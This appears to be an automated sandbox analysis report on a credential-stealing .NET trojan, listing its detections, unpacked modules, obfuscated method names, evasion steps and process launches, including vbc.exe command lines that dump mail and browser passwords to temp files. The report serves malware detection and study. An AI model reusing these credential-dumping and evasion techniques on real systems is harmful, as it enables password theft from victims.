Source: 0.0.UMUNNA1.exe.540000.0.unpack, VfCDGxLCwNyRp5SyIH/gghGWtpj6HnkevlTcY.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.UMUNNA1.exe.540000.0.unpack, VfCDGxLCwNyRp5SyIH/gghGWtpj6HnkevlTcY.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.UMUNNA1.exe.3b0000.0.unpack, VfCDGxLCwNyRp5SyIH/gghGWtpj6HnkevlTcY.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.UMUNNA1.exe.3b0000.0.unpack, VfCDGxLCwNyRp5SyIH/gghGWtpj6HnkevlTcY.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.UMUNNA1.exe.3b0000.0.unpack, VfCDGxLCwNyRp5SyIH/gghGWtpj6HnkevlTcY.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.UMUNNA1.exe.3b0000.0.unpack, VfCDGxLCwNyRp5SyIH/gghGWtpj6HnkevlTcY.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.UMUNNA1.exe.830000.1.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 4.2.UMUNNA1.exe.830000.1.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 4.2.UMUNNA1.exe.830000.1.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 4.2.UMUNNA1.exe.830000.1.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 4.2.UMUNNA1.exe.830000.1.unpack, Form1.cs

Base64 encoded string: 'kU9AKBYzTfDozk78v7S8AJ4qRIoajat5imvHiMgiRkXdoX1WWUMkcLeIbq0f5Ki+', 'YWcX/+xyZbonJzjf8XsXocMSojtcj/vlwv11qSUwGlGCejjW2Bxu0PvUiwFA0fWY', 'L7P+iy5vVV9MFR2A1YrtqvivrdT0sug458w1e4EPZLbz+cqzSvpehnm4plBBK3RQ0NzORG8/DePFVT8ZQgvOuw==', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@7/4@3/3

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 6_2_00415AFD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,

6_2_00415AFD

Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04FE0E72 AdjustTokenPrivileges,	0_2_04FE0E72
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04FE0E3B AdjustTokenPrivileges,	0_2_04FE0E3B
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4_2_04CE5476 AdjustTokenPrivileges,	4_2_04CE5476
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4_2_04CE543F AdjustTokenPrivileges,	4_2_04CE543F

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 6_2_00415F87 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,

6_2_00415F87

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 6_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,

6_2_00411196

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 5_2_0040ED0B FindResourceA,SizeofResource,LoadResource,LockResource,

5_2_0040ED0B

Source: C:\Users\user\Desktop\UMUNNA1.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\UMUNNA1.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\UMUNNA1.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

File created: C:\Users\user\AppData\Local\Temp\holdermail.txt

Jump to behavior

Source: UMUNNA1.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\UMUNNA1.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Users\user\Desktop\UMUNNA1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\UMUNNA1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, vbc.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, vbc.exe	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, vbc.exe, 00000006.00000002.688595177.0000000000400000.00000040.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, vbc.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, vbc.exe	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, vbc.exe	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, vbc.exe	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: UMUNNA1.exe	Virustotal: Detection: 81%
Source: UMUNNA1.exe	Metadefender: Detection: 28%
Source: UMUNNA1.exe	ReversingLabs: Detection: 65%

Source: unknown	Process created: C:\Users\user\Desktop\UMUNNA1.exe 'C:\Users\user\Desktop\UMUNNA1.exe'
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process created: C:\Users\user\Desktop\UMUNNA1.exe C:\Users\user\Desktop\UMUNNA1.exe
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process created: C:\Users\user\Desktop\UMUNNA1.exe C:\Users\user\Desktop\UMUNNA1.exe	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'	Jump to behavior

Source: C:\Users\user\Desktop\UMUNNA1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\UMUNNA1.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source: UMUNNA1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: C:\Users\user\Desktop\UMUNNA1.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: UMUNNA1.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: C:\Users\Adrian\Desktop\New folder\Dll\KFs1w6iPXQ9ctK\obj\Release\avimvIb.pdb source: UMUNNA1.exe, 00000000.00000002.670132115.0000000002BD1000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Adrian\Desktop\New folder\Startup\Intel\Intel\obj\Release\Lkdsrfgj.pdb source: UMUNNA1.exe, 00000000.00000002.670132115.0000000002BD1000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.922393547.0000000002B61000.00000004.00000001.sdmp
Source:	Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, vbc.exe
Source:	Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, vbc.exe
Source:	Binary string: mscorrc.pdb source: UMUNNA1.exe, 00000000.00000002.672498554.0000000004E50000.00000002.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924052820.0000000004FA0000.00000002.00000001.sdmp

Data Obfuscation:

.NET source code contains method to dynamically call methods (often used by packers)

Show sources

Source: UMUNNA1.exe, VfCDGxLCwNyRp5SyIH/gghGWtpj6HnkevlTcY.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.2.UMUNNA1.exe.540000.0.unpack, VfCDGxLCwNyRp5SyIH/gghGWtpj6HnkevlTcY.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.0.UMUNNA1.exe.540000.0.unpack, VfCDGxLCwNyRp5SyIH/gghGWtpj6HnkevlTcY.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 4.2.UMUNNA1.exe.3b0000.0.unpack, VfCDGxLCwNyRp5SyIH/gghGWtpj6HnkevlTcY.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 4.0.UMUNNA1.exe.3b0000.0.unpack, VfCDGxLCwNyRp5SyIH/gghGWtpj6HnkevlTcY.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)

.NET source code contains potential unpacker

Show sources

Source: 4.2.UMUNNA1.exe.830000.1.unpack, Form1.cs	.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.UMUNNA1.exe.830000.1.unpack, Form1.cs	.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.UMUNNA1.exe.830000.1.unpack, Form1.cs	.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.UMUNNA1.exe.830000.1.unpack, Form1.cs	.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 5_2_00403C3D LoadLibraryA,GetProcAddress,strcpy,

5_2_00403C3D

Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4_2_00CB24E0 push 78716A71h; retf	4_2_00CB24E5
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4_2_00DD7EF4 push eax; ret	4_2_00DD7EF5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 5_2_00411879 push ecx; ret	5_2_00411889
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 5_2_004118A0 push eax; ret	5_2_004118B4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 5_2_004118A0 push eax; ret	5_2_004118DC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00442871 push ecx; ret	6_2_00442881
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00442A90 push eax; ret	6_2_00442AA4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00442A90 push eax; ret	6_2_00442ACC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00446E54 push eax; ret	6_2_00446E61

Source: initial sample

Static PE information: section name: .text entropy: 7.73736029281

Source: UMUNNA1.exe, VfCDGxLCwNyRp5SyIH/gghGWtpj6HnkevlTcY.cs	High entropy of concatenated method names: '.cctor', 'EHDv94UtC85Ir', 'cjOfqQdvW', 'Vcye49I5i', 'lCA7cqQhC', 'gPiXyPhF0', 'druSDFj3Z', 'FbZNBvV1x', 'Dq1KNt5vw', 'OLRELNqo8'
Source: UMUNNA1.exe, OYfcsLMrtDnFFmfMrD/cKAo41wcePaJBLMQrw.cs	High entropy of concatenated method names: '.ctor', 'q764ajUxD', '.cctor', 'QjcopjdtQ', 'Dispose', 'TEyTByuwk', 'nmU3COs0fVGTNNKk9R', 'luHLWlk3YvWveVk259', 'tKRsZvQqQuXHk8UQxa', 'yCcAb9DQ2HOauMthxy'
Source: UMUNNA1.exe, uHNbHPxpgj2T9ynZSO/tMCS6d3rPuKqaS25Lo.cs	High entropy of concatenated method names: 'tjyv94UUwjOum', '.ctor', '.cctor', 'p7KxjVyn5kDq4i2BrZ4', 'FJy5RsylKotA6oITBpD', 'IBG3Llyg6MWr8EpCZ3F', 'gaLWD2ytXGO84m9jZrt', 'erN3x5yWOTeOQpJqgGH', 'h0QhBFyLA6gxNImGAL8', 'nYHgrJyFwurcbSRWi7X'
Source: UMUNNA1.exe, sLhcsl6HBLrUXrcAsu/E6CCvTinTBELb8nMFs.cs	High entropy of concatenated method names: 'xYn309mGT', '.ctor', 'TJI1RIq1pM7l6KOcDi', 'ClMkAQPQ1IQReYNqSP', 'XVKCsfXYHBIfjl8kW7', 'ibs1dR94n6hgU4tT1y', 'nFUpJLjwmRilxXxPjs', 'djJOyr70TuLoAC8pvQ', 'UV88WIOL7RVyni6cnf'
Source: 0.2.UMUNNA1.exe.540000.0.unpack, OYfcsLMrtDnFFmfMrD/cKAo41wcePaJBLMQrw.cs	High entropy of concatenated method names: '.ctor', 'q764ajUxD', '.cctor', 'QjcopjdtQ', 'Dispose', 'TEyTByuwk', 'nmU3COs0fVGTNNKk9R', 'luHLWlk3YvWveVk259', 'tKRsZvQqQuXHk8UQxa', 'yCcAb9DQ2HOauMthxy'
Source: 0.2.UMUNNA1.exe.540000.0.unpack, sLhcsl6HBLrUXrcAsu/E6CCvTinTBELb8nMFs.cs	High entropy of concatenated method names: 'xYn309mGT', '.ctor', 'TJI1RIq1pM7l6KOcDi', 'ClMkAQPQ1IQReYNqSP', 'XVKCsfXYHBIfjl8kW7', 'ibs1dR94n6hgU4tT1y', 'nFUpJLjwmRilxXxPjs', 'djJOyr70TuLoAC8pvQ', 'UV88WIOL7RVyni6cnf'
Source: 0.2.UMUNNA1.exe.540000.0.unpack, uHNbHPxpgj2T9ynZSO/tMCS6d3rPuKqaS25Lo.cs	High entropy of concatenated method names: 'tjyv94UUwjOum', '.ctor', '.cctor', 'p7KxjVyn5kDq4i2BrZ4', 'FJy5RsylKotA6oITBpD', 'IBG3Llyg6MWr8EpCZ3F', 'gaLWD2ytXGO84m9jZrt', 'erN3x5yWOTeOQpJqgGH', 'h0QhBFyLA6gxNImGAL8', 'nYHgrJyFwurcbSRWi7X'
Source: 0.2.UMUNNA1.exe.540000.0.unpack, VfCDGxLCwNyRp5SyIH/gghGWtpj6HnkevlTcY.cs	High entropy of concatenated method names: '.cctor', 'EHDv94UtC85Ir', 'cjOfqQdvW', 'Vcye49I5i', 'lCA7cqQhC', 'gPiXyPhF0', 'druSDFj3Z', 'FbZNBvV1x', 'Dq1KNt5vw', 'OLRELNqo8'
Source: 0.0.UMUNNA1.exe.540000.0.unpack, VfCDGxLCwNyRp5SyIH/gghGWtpj6HnkevlTcY.cs	High entropy of concatenated method names: '.cctor', 'EHDv94UtC85Ir', 'cjOfqQdvW', 'Vcye49I5i', 'lCA7cqQhC', 'gPiXyPhF0', 'druSDFj3Z', 'FbZNBvV1x', 'Dq1KNt5vw', 'OLRELNqo8'
Source: 0.0.UMUNNA1.exe.540000.0.unpack, OYfcsLMrtDnFFmfMrD/cKAo41wcePaJBLMQrw.cs	High entropy of concatenated method names: '.ctor', 'q764ajUxD', '.cctor', 'QjcopjdtQ', 'Dispose', 'TEyTByuwk', 'nmU3COs0fVGTNNKk9R', 'luHLWlk3YvWveVk259', 'tKRsZvQqQuXHk8UQxa', 'yCcAb9DQ2HOauMthxy'
Source: 0.0.UMUNNA1.exe.540000.0.unpack, sLhcsl6HBLrUXrcAsu/E6CCvTinTBELb8nMFs.cs	High entropy of concatenated method names: 'xYn309mGT', '.ctor', 'TJI1RIq1pM7l6KOcDi', 'ClMkAQPQ1IQReYNqSP', 'XVKCsfXYHBIfjl8kW7', 'ibs1dR94n6hgU4tT1y', 'nFUpJLjwmRilxXxPjs', 'djJOyr70TuLoAC8pvQ', 'UV88WIOL7RVyni6cnf'
Source: 0.0.UMUNNA1.exe.540000.0.unpack, uHNbHPxpgj2T9ynZSO/tMCS6d3rPuKqaS25Lo.cs	High entropy of concatenated method names: 'tjyv94UUwjOum', '.ctor', '.cctor', 'p7KxjVyn5kDq4i2BrZ4', 'FJy5RsylKotA6oITBpD', 'IBG3Llyg6MWr8EpCZ3F', 'gaLWD2ytXGO84m9jZrt', 'erN3x5yWOTeOQpJqgGH', 'h0QhBFyLA6gxNImGAL8', 'nYHgrJyFwurcbSRWi7X'
Source: 4.2.UMUNNA1.exe.3b0000.0.unpack, VfCDGxLCwNyRp5SyIH/gghGWtpj6HnkevlTcY.cs	High entropy of concatenated method names: '.cctor', 'EHDv94UtC85Ir', 'cjOfqQdvW', 'Vcye49I5i', 'lCA7cqQhC', 'gPiXyPhF0', 'druSDFj3Z', 'FbZNBvV1x', 'Dq1KNt5vw', 'OLRELNqo8'
Source: 4.2.UMUNNA1.exe.3b0000.0.unpack, OYfcsLMrtDnFFmfMrD/cKAo41wcePaJBLMQrw.cs	High entropy of concatenated method names: '.ctor', 'q764ajUxD', '.cctor', 'QjcopjdtQ', 'Dispose', 'TEyTByuwk', 'nmU3COs0fVGTNNKk9R', 'luHLWlk3YvWveVk259', 'tKRsZvQqQuXHk8UQxa', 'yCcAb9DQ2HOauMthxy'
Source: 4.2.UMUNNA1.exe.3b0000.0.unpack, uHNbHPxpgj2T9ynZSO/tMCS6d3rPuKqaS25Lo.cs	High entropy of concatenated method names: 'tjyv94UUwjOum', '.ctor', '.cctor', 'p7KxjVyn5kDq4i2BrZ4', 'FJy5RsylKotA6oITBpD', 'IBG3Llyg6MWr8EpCZ3F', 'gaLWD2ytXGO84m9jZrt', 'erN3x5yWOTeOQpJqgGH', 'h0QhBFyLA6gxNImGAL8', 'nYHgrJyFwurcbSRWi7X'
Source: 4.2.UMUNNA1.exe.3b0000.0.unpack, sLhcsl6HBLrUXrcAsu/E6CCvTinTBELb8nMFs.cs	High entropy of concatenated method names: 'xYn309mGT', '.ctor', 'TJI1RIq1pM7l6KOcDi', 'ClMkAQPQ1IQReYNqSP', 'XVKCsfXYHBIfjl8kW7', 'ibs1dR94n6hgU4tT1y', 'nFUpJLjwmRilxXxPjs', 'djJOyr70TuLoAC8pvQ', 'UV88WIOL7RVyni6cnf'
Source: 4.0.UMUNNA1.exe.3b0000.0.unpack, VfCDGxLCwNyRp5SyIH/gghGWtpj6HnkevlTcY.cs	High entropy of concatenated method names: '.cctor', 'EHDv94UtC85Ir', 'cjOfqQdvW', 'Vcye49I5i', 'lCA7cqQhC', 'gPiXyPhF0', 'druSDFj3Z', 'FbZNBvV1x', 'Dq1KNt5vw', 'OLRELNqo8'
Source: 4.0.UMUNNA1.exe.3b0000.0.unpack, OYfcsLMrtDnFFmfMrD/cKAo41wcePaJBLMQrw.cs	High entropy of concatenated method names: '.ctor', 'q764ajUxD', '.cctor', 'QjcopjdtQ', 'Dispose', 'TEyTByuwk', 'nmU3COs0fVGTNNKk9R', 'luHLWlk3YvWveVk259', 'tKRsZvQqQuXHk8UQxa', 'yCcAb9DQ2HOauMthxy'
Source: 4.0.UMUNNA1.exe.3b0000.0.unpack, uHNbHPxpgj2T9ynZSO/tMCS6d3rPuKqaS25Lo.cs	High entropy of concatenated method names: 'tjyv94UUwjOum', '.ctor', '.cctor', 'p7KxjVyn5kDq4i2BrZ4', 'FJy5RsylKotA6oITBpD', 'IBG3Llyg6MWr8EpCZ3F', 'gaLWD2ytXGO84m9jZrt', 'erN3x5yWOTeOQpJqgGH', 'h0QhBFyLA6gxNImGAL8', 'nYHgrJyFwurcbSRWi7X'
Source: 4.0.UMUNNA1.exe.3b0000.0.unpack, sLhcsl6HBLrUXrcAsu/E6CCvTinTBELb8nMFs.cs	High entropy of concatenated method names: 'xYn309mGT', '.ctor', 'TJI1RIq1pM7l6KOcDi', 'ClMkAQPQ1IQReYNqSP', 'XVKCsfXYHBIfjl8kW7', 'ibs1dR94n6hgU4tT1y', 'nFUpJLjwmRilxXxPjs', 'djJOyr70TuLoAC8pvQ', 'UV88WIOL7RVyni6cnf'

Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Show sources

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: icon426.png

Changes the view of files in windows explorer (hidden files and folders)

Show sources

Source: C:\Users\user\Desktop\UMUNNA1.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\UMUNNA1.exe

File opened: C:\Users\user\Desktop\UMUNNA1.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 5_2_0040F64B memset,strcpy,memset,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

5_2_0040F64B

Source: C:\Users\user\Desktop\UMUNNA1.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
